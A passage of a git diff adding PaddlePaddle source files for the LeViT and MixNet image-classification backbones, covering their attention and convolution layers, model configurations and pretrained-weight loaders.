dilation=1, + groups=1, + bn_weight_init=1, + resolution=-10000): + super().__init__() + self.add_sublayer( + 'c', + nn.Conv2D( + a, b, ks, stride, pad, dilation, groups, bias_attr=False)) + bn = nn.BatchNorm2D(b) + ones_(bn.weight) + zeros_(bn.bias) + self.add_sublayer('bn', bn) + + +class Linear_BN(nn.Sequential): + def __init__(self, a, b, bn_weight_init=1): + super().__init__() + self.add_sublayer('c', nn.Linear(a, b, bias_attr=False)) + bn = nn.BatchNorm1D(b) + if bn_weight_init == 0: + zeros_(bn.weight) + else: + ones_(bn.weight) + zeros_(bn.bias) + self.add_sublayer('bn', bn) + + def forward(self, x): + l, bn = self._sub_layers.values() + x = l(x) + return paddle.reshape(bn(x.flatten(0, 1)), x.shape) + + +class BN_Linear(nn.Sequential): + def __init__(self, a, b, bias=True, std=0.02): + super().__init__() + self.add_sublayer('bn', nn.BatchNorm1D(a)) + l = nn.Linear(a, b, bias_attr=bias) + trunc_normal_(l.weight) + if bias: + zeros_(l.bias) + self.add_sublayer('l', l) + + +def b16(n, activation, resolution=224): + return nn.Sequential( + Conv2d_BN( + 3, n // 8, 3, 2, 1, resolution=resolution), + activation(), + Conv2d_BN( + n // 8, n // 4, 3, 2, 1, resolution=resolution // 2), + activation(), + Conv2d_BN( + n // 4, n // 2, 3, 2, 1, resolution=resolution // 4), + activation(), + Conv2d_BN( + n // 2, n, 3, 2, 1, resolution=resolution // 8)) + + +class Residual(nn.Layer): + def __init__(self, m, drop): + super().__init__() + self.m = m + self.drop = drop + + def forward(self, x): + if self.training and self.drop > 0: + y = paddle.rand( + shape=[x.shape[0], 1, 1]).__ge__(self.drop).astype("float32") + y = y.divide(paddle.full_like(y, 1 - self.drop)) + return paddle.add(x, y) + else: + return paddle.add(x, self.m(x)) + + +class Attention(nn.Layer): + def __init__(self, + dim, + key_dim, + num_heads=8, + attn_ratio=4, + activation=None, + resolution=14): + super().__init__() + self.num_heads = num_heads + self.scale = key_dim**-0.5 + self.key_dim = key_dim + self.nh_kd = nh_kd = key_dim * num_heads + self.d = int(attn_ratio * key_dim) + self.dh = int(attn_ratio * key_dim) * num_heads + self.attn_ratio = attn_ratio + self.h = self.dh + nh_kd * 2 + self.qkv = Linear_BN(dim, self.h) + self.proj = nn.Sequential( + activation(), Linear_BN( + self.dh, dim, bn_weight_init=0)) + points = list(itertools.product(range(resolution), range(resolution))) + N = len(points) + attention_offsets = {} + idxs = [] + for p1 in points: + for p2 in points: + offset = (abs(p1[0] - p2[0]), abs(p1[1] - p2[1])) + if offset not in attention_offsets: + attention_offsets[offset] = len(attention_offsets) + idxs.append(attention_offsets[offset]) + self.attention_biases = self.create_parameter( + shape=(num_heads, len(attention_offsets)), + default_initializer=zeros_, + attr=paddle.ParamAttr(regularizer=L2Decay(0.0))) + tensor_idxs = paddle.to_tensor(idxs, dtype='int64') + self.register_buffer('attention_bias_idxs', + paddle.reshape(tensor_idxs, [N, N])) + + @paddle.no_grad() + def train(self, mode=True): + if mode: + super().train() + else: + super().eval() + if mode and hasattr(self, 'ab'): + del self.ab + else: + self.ab = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + + def forward(self, x): + self.training = True + B, N, C = x.shape + qkv = self.qkv(x) + qkv = paddle.reshape(qkv, + [B, N, self.num_heads, self.h // self.num_heads]) + q, k, v = paddle.split( + qkv, [self.key_dim, self.key_dim, self.d], axis=3) + q = paddle.transpose(q, perm=[0, 2, 1, 3]) + k = paddle.transpose(k, perm=[0, 2, 1, 3]) + v = paddle.transpose(v, perm=[0, 2, 1, 3]) + k_transpose = paddle.transpose(k, perm=[0, 1, 3, 2]) + + if self.training: + attention_biases = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + else: + attention_biases = self.ab + attn = (paddle.matmul(q, k_transpose) * self.scale + attention_biases) + attn = F.softmax(attn) + x = paddle.transpose(paddle.matmul(attn, v), perm=[0, 2, 1, 3]) + x = paddle.reshape(x, [B, N, self.dh]) + x = self.proj(x) + return x + + +class Subsample(nn.Layer): + def __init__(self, stride, resolution): + super().__init__() + self.stride = stride + self.resolution = resolution + + def forward(self, x): + B, N, C = x.shape + x = paddle.reshape(x, [B, self.resolution, self.resolution, C]) + end1, end2 = x.shape[1], x.shape[2] + x = x[:, 0:end1:self.stride, 0:end2:self.stride] + x = paddle.reshape(x, [B, -1, C]) + return x + + +class AttentionSubsample(nn.Layer): + def __init__(self, + in_dim, + out_dim, + key_dim, + num_heads=8, + attn_ratio=2, + activation=None, + stride=2, + resolution=14, + resolution_=7): + super().__init__() + self.num_heads = num_heads + self.scale = key_dim**-0.5 + self.key_dim = key_dim + self.nh_kd = nh_kd = key_dim * num_heads + self.d = int(attn_ratio * key_dim) + self.dh = int(attn_ratio * key_dim) * self.num_heads + self.attn_ratio = attn_ratio + self.resolution_ = resolution_ + self.resolution_2 = resolution_**2 + self.training = True + h = self.dh + nh_kd + self.kv = Linear_BN(in_dim, h) + + self.q = nn.Sequential( + Subsample(stride, resolution), Linear_BN(in_dim, nh_kd)) + self.proj = nn.Sequential(activation(), Linear_BN(self.dh, out_dim)) + + self.stride = stride + self.resolution = resolution + points = list(itertools.product(range(resolution), range(resolution))) + points_ = list( + itertools.product(range(resolution_), range(resolution_))) + + N = len(points) + N_ = len(points_) + attention_offsets = {} + idxs = [] + i = 0 + j = 0 + for p1 in points_: + i += 1 + for p2 in points: + j += 1 + size = 1 + offset = (abs(p1[0] * stride - p2[0] + (size - 1) / 2), + abs(p1[1] * stride - p2[1] + (size - 1) / 2)) + if offset not in attention_offsets: + attention_offsets[offset] = len(attention_offsets) + idxs.append(attention_offsets[offset]) + self.attention_biases = self.create_parameter( + shape=(num_heads, len(attention_offsets)), + default_initializer=zeros_, + attr=paddle.ParamAttr(regularizer=L2Decay(0.0))) + + tensor_idxs_ = paddle.to_tensor(idxs, dtype='int64') + self.register_buffer('attention_bias_idxs', + paddle.reshape(tensor_idxs_, [N_, N])) + + @paddle.no_grad() + def train(self, mode=True): + if mode: + super().train() + else: + super().eval() + if mode and hasattr(self, 'ab'): + del self.ab + else: + self.ab = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + + def forward(self, x): + self.training = True + B, N, C = x.shape + kv = self.kv(x) + kv = paddle.reshape(kv, [B, N, self.num_heads, -1]) + k, v = paddle.split(kv, [self.key_dim, self.d], axis=3) + k = paddle.transpose(k, perm=[0, 2, 1, 3]) # BHNC + v = paddle.transpose(v, perm=[0, 2, 1, 3]) + q = paddle.reshape( + self.q(x), [B, self.resolution_2, self.num_heads, self.key_dim]) + q = paddle.transpose(q, perm=[0, 2, 1, 3]) + + if self.training: + attention_biases = cal_attention_biases(self.attention_biases, + self.attention_bias_idxs) + else: + attention_biases = self.ab + + attn = (paddle.matmul( + q, paddle.transpose( + k, perm=[0, 1, 3, 2]))) * self.scale + attention_biases + attn = F.softmax(attn) + + x = paddle.reshape( + paddle.transpose( + paddle.matmul(attn, v), perm=[0, 2, 1, 3]), [B, -1, self.dh]) + x = self.proj(x) + return x + + +class LeViT(nn.Layer): + """ Vision Transformer with support for patch or hybrid CNN input stage + """ + + def __init__(self, + img_size=224, + patch_size=16, + in_chans=3, + class_num=1000, + embed_dim=[192], + key_dim=[64], + depth=[12], + num_heads=[3], + attn_ratio=[2], + mlp_ratio=[2], + hybrid_backbone=None, + down_ops=[], + attention_activation=nn.Hardswish, + mlp_activation=nn.Hardswish, + distillation=True, + drop_path=0): + super().__init__() + + self.class_num = class_num + self.num_features = embed_dim[-1] + self.embed_dim = embed_dim + self.distillation = distillation + + self.patch_embed = hybrid_backbone + + self.blocks = [] + down_ops.append(['']) + resolution = img_size // patch_size + for i, (ed, kd, dpth, nh, ar, mr, do) in enumerate( + zip(embed_dim, key_dim, depth, num_heads, attn_ratio, + mlp_ratio, down_ops)): + for _ in range(dpth): + self.blocks.append( + Residual( + Attention( + ed, + kd, + nh, + attn_ratio=ar, + activation=attention_activation, + resolution=resolution, ), + drop_path)) + if mr > 0: + h = int(ed * mr) + self.blocks.append( + Residual( + nn.Sequential( + Linear_BN(ed, h), + mlp_activation(), + Linear_BN( + h, ed, bn_weight_init=0), ), + drop_path)) + if do[0] == 'Subsample': + #('Subsample',key_dim, num_heads, attn_ratio, mlp_ratio, stride) + resolution_ = (resolution - 1) // do[5] + 1 + self.blocks.append( + AttentionSubsample( + *embed_dim[i:i + 2], + key_dim=do[1], + num_heads=do[2], + attn_ratio=do[3], + activation=attention_activation, + stride=do[5], + resolution=resolution, + resolution_=resolution_)) + resolution = resolution_ + if do[4] > 0: # mlp_ratio + h = int(embed_dim[i + 1] * do[4]) + self.blocks.append( + Residual( + nn.Sequential( + Linear_BN(embed_dim[i + 1], h), + mlp_activation(), + Linear_BN( + h, embed_dim[i + 1], bn_weight_init=0), ), + drop_path)) + self.blocks = nn.Sequential(*self.blocks) + + # Classifier head + self.head = BN_Linear(embed_dim[-1], + class_num) if class_num > 0 else Identity() + if distillation: + self.head_dist = BN_Linear( + embed_dim[-1], class_num) if class_num > 0 else Identity() + + def forward(self, x): + x = self.patch_embed(x) + x = x.flatten(2) + x = paddle.transpose(x, perm=[0, 2, 1]) + x = self.blocks(x) + x = x.mean(1) + + x = paddle.reshape(x, [-1, self.embed_dim[-1]]) + if self.distillation: + x = self.head(x), self.head_dist(x) + if not self.training: + x = (x[0] + x[1]) / 2 + else: + x = self.head(x) + return x + + +def model_factory(C, D, X, N, drop_path, class_num, distillation): + embed_dim = [int(x) for x in C.split('_')] + num_heads = [int(x) for x in N.split('_')] + depth = [int(x) for x in X.split('_')] + act = nn.Hardswish + model = LeViT( + patch_size=16, + embed_dim=embed_dim, + num_heads=num_heads, + key_dim=[D] * 3, + depth=depth, + attn_ratio=[2, 2, 2], + mlp_ratio=[2, 2, 2], + down_ops=[ + #('Subsample',key_dim, num_heads, attn_ratio, mlp_ratio, stride) + ['Subsample', D, embed_dim[0] // D, 4, 2, 2], + ['Subsample', D, embed_dim[1] // D, 4, 2, 2], + ], + attention_activation=act, + mlp_activation=act, + hybrid_backbone=b16(embed_dim[0], activation=act), + class_num=class_num, + drop_path=drop_path, + distillation=distillation) + + return model + + +specification = { + 'LeViT_128S': { + 'C': '128_256_384', + 'D': 16, + 'N': '4_6_8', + 'X': '2_3_4', + 'drop_path': 0 + }, + 'LeViT_128': { + 'C': '128_256_384', + 'D': 16, + 'N': '4_8_12', + 'X': '4_4_4', + 'drop_path': 0 + }, + 'LeViT_192': { + 'C': '192_288_384', + 'D': 32, + 'N': '3_5_6', + 'X': '4_4_4', + 'drop_path': 0 + }, + 'LeViT_256': { + 'C': '256_384_512', + 'D': 32, + 'N': '4_6_8', + 'X': '4_4_4', + 'drop_path': 0 + }, + 'LeViT_384': { + 'C': '384_512_768', + 'D': 32, + 'N': '6_9_12', + 'X': '4_4_4', + 'drop_path': 0.1 + }, +} + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def LeViT_128S(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_128S'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_128S"], use_ssld=use_ssld) + return model + + +def LeViT_128(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_128'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_128"], use_ssld=use_ssld) + return model + + +def LeViT_192(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_192'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_192"], use_ssld=use_ssld) + return model + + +def LeViT_256(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_256'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_256"], use_ssld=use_ssld) + return model + + +def LeViT_384(pretrained=False, + use_ssld=False, + class_num=1000, + distillation=False, + **kwargs): + model = model_factory( + **specification['LeViT_384'], + class_num=class_num, + distillation=distillation) + _load_pretrained( + pretrained, model, MODEL_URLS["LeViT_384"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mixnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mixnet.py new file mode 100644 index 0000000..c2a1adb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/mixnet.py @@ -0,0 +1,815 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +""" + MixNet for ImageNet-1K, implemented in Paddle. + Original paper: 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. +""" + +import os +from inspect import isfunction +from functools import reduce +import paddle +import paddle.nn as nn + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MixNet_S": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MixNet_S_pretrained.pdparams", + "MixNet_M": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MixNet_M_pretrained.pdparams", + "MixNet_L": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/MixNet_L_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +class Identity(nn.Layer): + """ + Identity block. + """ + + def __init__(self): + super(Identity, self).__init__() + + def forward(self, x): + return x + + +def round_channels(channels, divisor=8): + """ + Round weighted channel number (make divisible operation). + + Parameters: + ---------- + channels : int or float + Original number of channels. + divisor : int, default 8 + Alignment value. + + Returns: + ------- + int + Weighted number of channels. + """ + rounded_channels = max( + int(channels + divisor / 2.0) // divisor * divisor, divisor) + if float(rounded_channels) < 0.9 * channels: + rounded_channels += divisor + return rounded_channels + + +def get_activation_layer(activation): + """ + Create activation layer from string/function. + + Parameters: + ---------- + activation : function, or str, or nn.Module + Activation function or name of activation function. + + Returns: + ------- + nn.Module + Activation layer. + """ + assert activation is not None + if isfunction(activation): + return activation() + elif isinstance(activation, str): + if activation == "relu": + return nn.ReLU() + elif activation == "relu6": + return nn.ReLU6() + elif activation == "swish": + return nn.Swish() + elif activation == "hswish": + return nn.Hardswish() + elif activation == "sigmoid": + return nn.Sigmoid() + elif activation == "hsigmoid": + return nn.Hardsigmoid() + elif activation == "identity": + return Identity() + else: + raise NotImplementedError() + else: + assert isinstance(activation, nn.Layer) + return activation + + +class ConvBlock(nn.Layer): + """ + Standard convolution block with Batch normalization and activation. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + kernel_size : int or tuple/list of 2 int + Convolution window size. + stride : int or tuple/list of 2 int + Strides of the convolution. + padding : int, or tuple/list of 2 int, or tuple/list of 4 int + Padding value for convolution layer. + dilation : int or tuple/list of 2 int, default 1 + Dilation value for convolution layer. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. + use_bn : bool, default True + Whether to use BatchNorm layer. + bn_eps : float, default 1e-5 + Small float added to variance in Batch norm. + activation : function or str or None, default nn.ReLU() + Activation function or name of activation function. + """ + + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride, + padding, + dilation=1, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU()): + super(ConvBlock, self).__init__() + self.activate = (activation is not None) + self.use_bn = use_bn + self.use_pad = (isinstance(padding, (list, tuple)) and + (len(padding) == 4)) + + if self.use_pad: + self.pad = padding + self.conv = nn.Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + dilation=dilation, + groups=groups, + bias_attr=bias, + weight_attr=None) + if self.use_bn: + self.bn = nn.BatchNorm2D(num_features=out_channels, epsilon=bn_eps) + if self.activate: + self.activ = get_activation_layer(activation) + + def forward(self, x): + x = self.conv(x) + if self.use_bn: + x = self.bn(x) + if self.activate: + x = self.activ(x) + return x + + +class SEBlock(nn.Layer): + def __init__(self, + channels, + reduction=16, + mid_channels=None, + round_mid=False, + use_conv=True, + mid_activation=nn.ReLU(), + out_activation=nn.Sigmoid()): + super(SEBlock, self).__init__() + self.use_conv = use_conv + if mid_channels is None: + mid_channels = channels // reduction if not round_mid else round_channels( + float(channels) / reduction) + + self.pool = nn.AdaptiveAvgPool2D(output_size=1) + if use_conv: + self.conv1 = nn.Conv2D( + in_channels=channels, + out_channels=mid_channels, + kernel_size=1, + stride=1, + groups=1, + bias_attr=True, + weight_attr=None) + + else: + self.fc1 = nn.Linear( + in_features=channels, out_features=mid_channels) + self.activ = get_activation_layer(mid_activation) + if use_conv: + self.conv2 = nn.Conv2D( + in_channels=mid_channels, + out_channels=channels, + kernel_size=1, + stride=1, + groups=1, + bias_attr=True, + weight_attr=None) + else: + self.fc2 = nn.Linear( + in_features=mid_channels, out_features=channels) + self.sigmoid = get_activation_layer(out_activation) + + def forward(self, x): + w = self.pool(x) + if not self.use_conv: + w = w.reshape(shape=[w.shape[0], -1]) + w = self.conv1(w) if self.use_conv else self.fc1(w) + w = self.activ(w) + w = self.conv2(w) if self.use_conv else self.fc2(w) + w = self.sigmoid(w) + if not self.use_conv: + w = w.unsqueeze(2).unsqueeze(3) + x = x * w + return x + + +class MixConv(nn.Layer): + """ + Mixed convolution layer from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + kernel_size : int or tuple/list of int, or tuple/list of tuple/list of 2 int + Convolution window size. + stride : int or tuple/list of 2 int + Strides of the convolution. + padding : int or tuple/list of int, or tuple/list of tuple/list of 2 int + Padding value for convolution layer. + dilation : int or tuple/list of 2 int, default 1 + Dilation value for convolution layer. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. + axis : int, default 1 + The axis on which to concatenate the outputs. + """ + + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride, + padding, + dilation=1, + groups=1, + bias=False, + axis=1): + super(MixConv, self).__init__() + kernel_size = kernel_size if isinstance(kernel_size, + list) else [kernel_size] + padding = padding if isinstance(padding, list) else [padding] + kernel_count = len(kernel_size) + self.splitted_in_channels = self.split_channels(in_channels, + kernel_count) + splitted_out_channels = self.split_channels(out_channels, kernel_count) + for i, kernel_size_i in enumerate(kernel_size): + in_channels_i = self.splitted_in_channels[i] + out_channels_i = splitted_out_channels[i] + padding_i = padding[i] + _ = self.add_sublayer( + name=str(i), + sublayer=nn.Conv2D( + in_channels=in_channels_i, + out_channels=out_channels_i, + kernel_size=kernel_size_i, + stride=stride, + padding=padding_i, + dilation=dilation, + groups=(out_channels_i + if out_channels == groups else groups), + bias_attr=bias, + weight_attr=None)) + self.axis = axis + + def forward(self, x): + xx = paddle.split(x, self.splitted_in_channels, axis=self.axis) + xx = paddle.split(x, self.splitted_in_channels, axis=self.axis) + out = [ + conv_i(x_i) for x_i, conv_i in zip(xx, self._sub_layers.values()) + ] + x = paddle.concat(tuple(out), axis=self.axis) + return x + + @staticmethod + def split_channels(channels, kernel_count): + splitted_channels = [channels // kernel_count] * kernel_count + splitted_channels[0] += channels - sum(splitted_channels) + return splitted_channels + + +class MixConvBlock(nn.Layer): + """ + Mixed convolution block with Batch normalization and activation. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + kernel_size : int or tuple/list of int, or tuple/list of tuple/list of 2 int + Convolution window size. + stride : int or tuple/list of 2 int + Strides of the convolution. + padding : int or tuple/list of int, or tuple/list of tuple/list of 2 int + Padding value for convolution layer. + dilation : int or tuple/list of 2 int, default 1 + Dilation value for convolution layer. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. + use_bn : bool, default True + Whether to use BatchNorm layer. + bn_eps : float, default 1e-5 + Small float added to variance in Batch norm. + activation : function or str or None, default nn.ReLU() + Activation function or name of activation function. + activate : bool, default True + Whether activate the convolution block. + """ + + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride, + padding, + dilation=1, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU()): + super(MixConvBlock, self).__init__() + self.activate = (activation is not None) + self.use_bn = use_bn + + self.conv = MixConv( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + dilation=dilation, + groups=groups, + bias=bias) + if self.use_bn: + self.bn = nn.BatchNorm2D(num_features=out_channels, epsilon=bn_eps) + if self.activate: + self.activ = get_activation_layer(activation) + + def forward(self, x): + x = self.conv(x) + if self.use_bn: + x = self.bn(x) + if self.activate: + x = self.activ(x) + return x + + +def mixconv1x1_block(in_channels, + out_channels, + kernel_count, + stride=1, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU()): + """ + 1x1 version of the mixed convolution block. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + kernel_count : int + Kernel count. + stride : int or tuple/list of 2 int, default 1 + Strides of the convolution. + groups : int, default 1 + Number of groups. + bias : bool, default False + Whether the layer uses a bias vector. + use_bn : bool, default True + Whether to use BatchNorm layer. + bn_eps : float, default 1e-5 + Small float added to variance in Batch norm. + activation : function or str, or None, default nn.ReLU() + Activation function or name of activation function. + """ + return MixConvBlock( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=([1] * kernel_count), + stride=stride, + padding=([0] * kernel_count), + groups=groups, + bias=bias, + use_bn=use_bn, + bn_eps=bn_eps, + activation=activation) + + +class MixUnit(nn.Layer): + """ + MixNet unit. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. exp_channels : int + Number of middle (expanded) channels. + stride : int or tuple/list of 2 int + Strides of the second convolution layer. + exp_kernel_count : int + Expansion convolution kernel count for each unit. + conv1_kernel_count : int + Conv1 kernel count for each unit. + conv2_kernel_count : int + Conv2 kernel count for each unit. + exp_factor : int + Expansion factor for each unit. + se_factor : int + SE reduction factor for each unit. + activation : str + Activation function or name of activation function. + """ + + def __init__(self, in_channels, out_channels, stride, exp_kernel_count, + conv1_kernel_count, conv2_kernel_count, exp_factor, se_factor, + activation): + super(MixUnit, self).__init__() + assert exp_factor >= 1 + assert se_factor >= 0 + self.residual = (in_channels == out_channels) and (stride == 1) + self.use_se = se_factor > 0 + mid_channels = exp_factor * in_channels + self.use_exp_conv = exp_factor > 1 + + if self.use_exp_conv: + if exp_kernel_count == 1: + self.exp_conv = ConvBlock( + in_channels=in_channels, + out_channels=mid_channels, + kernel_size=1, + stride=1, + padding=0, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=activation) + else: + self.exp_conv = mixconv1x1_block( + in_channels=in_channels, + out_channels=mid_channels, + kernel_count=exp_kernel_count, + activation=activation) + if conv1_kernel_count == 1: + self.conv1 = ConvBlock( + in_channels=mid_channels, + out_channels=mid_channels, + kernel_size=3, + stride=stride, + padding=1, + dilation=1, + groups=mid_channels, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=activation) + else: + self.conv1 = MixConvBlock( + in_channels=mid_channels, + out_channels=mid_channels, + kernel_size=[3 + 2 * i for i in range(conv1_kernel_count)], + stride=stride, + padding=[1 + i for i in range(conv1_kernel_count)], + groups=mid_channels, + activation=activation) + if self.use_se: + self.se = SEBlock( + channels=mid_channels, + reduction=(exp_factor * se_factor), + round_mid=False, + mid_activation=activation) + if conv2_kernel_count == 1: + self.conv2 = ConvBlock( + in_channels=mid_channels, + out_channels=out_channels, + activation=None, + kernel_size=1, + stride=1, + padding=0, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5) + else: + self.conv2 = mixconv1x1_block( + in_channels=mid_channels, + out_channels=out_channels, + kernel_count=conv2_kernel_count, + activation=None) + + def forward(self, x): + if self.residual: + identity = x + if self.use_exp_conv: + x = self.exp_conv(x) + x = self.conv1(x) + if self.use_se: + x = self.se(x) + x = self.conv2(x) + if self.residual: + x = x + identity + return x + + +class MixInitBlock(nn.Layer): + """ + MixNet specific initial block. + + Parameters: + ---------- + in_channels : int + Number of input channels. + out_channels : int + Number of output channels. + """ + + def __init__(self, in_channels, out_channels): + super(MixInitBlock, self).__init__() + self.conv1 = ConvBlock( + in_channels=in_channels, + out_channels=out_channels, + stride=2, + kernel_size=3, + padding=1) + self.conv2 = MixUnit( + in_channels=out_channels, + out_channels=out_channels, + stride=1, + exp_kernel_count=1, + conv1_kernel_count=1, + conv2_kernel_count=1, + exp_factor=1, + se_factor=0, + activation="relu") + + def forward(self, x): + x = self.conv1(x) + x = self.conv2(x) + return x + + +class MixNet(nn.Layer): + """ + MixNet model from 'MixConv: Mixed Depthwise Convolutional Kernels,' + https://arxiv.org/abs/1907.09595. + + Parameters: + ---------- + channels : list of list of int + Number of output channels for each unit. + init_block_channels : int + Number of output channels for the initial unit. + final_block_channels : int + Number of output channels for the final block of the feature extractor. + exp_kernel_counts : list of list of int + Expansion convolution kernel count for each unit. + conv1_kernel_counts : list of list of int + Conv1 kernel count for each unit. + conv2_kernel_counts : list of list of int + Conv2 kernel count for each unit. + exp_factors : list of list of int + Expansion factor for each unit. + se_factors : list of list of int + SE reduction factor for each unit. + in_channels : int, default 3 + Number of input channels. + in_size : tuple of two ints, default (224, 224) + Spatial size of the expected input image. + class_num : int, default 1000 + Number of classification classes. + """ + + def __init__(self, + channels, + init_block_channels, + final_block_channels, + exp_kernel_counts, + conv1_kernel_counts, + conv2_kernel_counts, + exp_factors, + se_factors, + in_channels=3, + in_size=(224, 224), + class_num=1000): + super(MixNet, self).__init__() + self.in_size = in_size + self.class_num = class_num + + self.features = nn.Sequential() + self.features.add_sublayer( + "init_block", + MixInitBlock( + in_channels=in_channels, out_channels=init_block_channels)) + in_channels = init_block_channels + for i, channels_per_stage in enumerate(channels): + stage = nn.Sequential() + for j, out_channels in enumerate(channels_per_stage): + stride = 2 if ((j == 0) and (i != 3)) or ( + (j == len(channels_per_stage) // 2) and (i == 3)) else 1 + exp_kernel_count = exp_kernel_counts[i][j] + conv1_kernel_count = conv1_kernel_counts[i][j] + conv2_kernel_count = conv2_kernel_counts[i][j] + exp_factor = exp_factors[i][j] + se_factor = se_factors[i][j] + activation = "relu" if i == 0 else "swish" + stage.add_sublayer( + "unit{}".format(j + 1), + MixUnit( + in_channels=in_channels, + out_channels=out_channels, + stride=stride, + exp_kernel_count=exp_kernel_count, + conv1_kernel_count=conv1_kernel_count, + conv2_kernel_count=conv2_kernel_count, + exp_factor=exp_factor, + se_factor=se_factor, + activation=activation)) + in_channels = out_channels + self.features.add_sublayer("stage{}".format(i + 1), stage) + self.features.add_sublayer( + "final_block", + ConvBlock( + in_channels=in_channels, + out_channels=final_block_channels, + kernel_size=1, + stride=1, + padding=0, + groups=1, + bias=False, + use_bn=True, + bn_eps=1e-5, + activation=nn.ReLU())) + in_channels = final_block_channels + self.features.add_sublayer( + "final_pool", nn.AvgPool2D( + kernel_size=7, stride=1)) + + self.output = nn.Linear( + in_features=in_channels, out_features=class_num) + + def forward(self, x): + x = self.features(x) + reshape_dim = reduce(lambda x, y: x * y, x.shape[1:]) + x = x.reshape(shape=[x.shape[0], reshape_dim]) + x = self.output(x) + return x + + +def get_mixnet(version, width_scale, model_name=None, **kwargs): + """ + Create MixNet model with specific parameters. + + Parameters: + ---------- + version : str + Version of MobileNetV3 ('s' or 'm'). + width_scale : float + Scale factor for width of layers. + model_name : str or None, default None + Model name. + """ + + if version == "s": + init_block_channels = 16 + channels = [[24, 24], [40, 40, 40, 40], [80, 80, 80], + [120, 120, 120, 200, 200, 200]] + exp_kernel_counts = [[2, 2], [1, 2, 2, 2], [1, 1, 1], + [2, 2, 2, 1, 1, 1]] + conv1_kernel_counts = [[1, 1], [3, 2, 2, 2], [3, 2, 2], + [3, 4, 4, 5, 4, 4]] + conv2_kernel_counts = [[2, 2], [1, 2, 2, 2], [2, 2, 2], + [2, 2, 2, 1, 2, 2]] + exp_factors = [[6, 3], [6, 6, 6, 6], [6, 6, 6], [6, 3, 3, 6, 6, 6]] + se_factors = [[0, 0], [2, 2, 2, 2], [4, 4, 4], [2, 2, 2, 2, 2, 2]] + elif version == "m": + init_block_channels = 24 + channels = [[32, 32], [40, 40, 40, 40], [80, 80, 80, 80], + [120, 120, 120, 120, 200, 200, 200, 200]] + exp_kernel_counts = [[2, 2], [1, 2, 2, 2], [1, 2, 2, 2], + [1, 2, 2, 2, 1, 1, 1, 1]] + conv1_kernel_counts = [[3, 1], [4, 2, 2, 2], [3, 4, 4, 4], + [1, 4, 4, 4, 4, 4, 4, 4]] + conv2_kernel_counts = [[2, 2], [1, 2, 2, 2], [1, 2, 2, 2], + [1, 2, 2, 2, 1, 2, 2, 2]] + exp_factors = [[6, 3], [6, 6, 6, 6], [6, 6, 6, 6], + [6, 3, 3, 3, 6, 6, 6, 6]] + se_factors = [[0, 0], [2, 2, 2, 2], [4, 4, 4, 4], + [2, 2, 2, 2, 2, 2, 2, 2]] + else: + 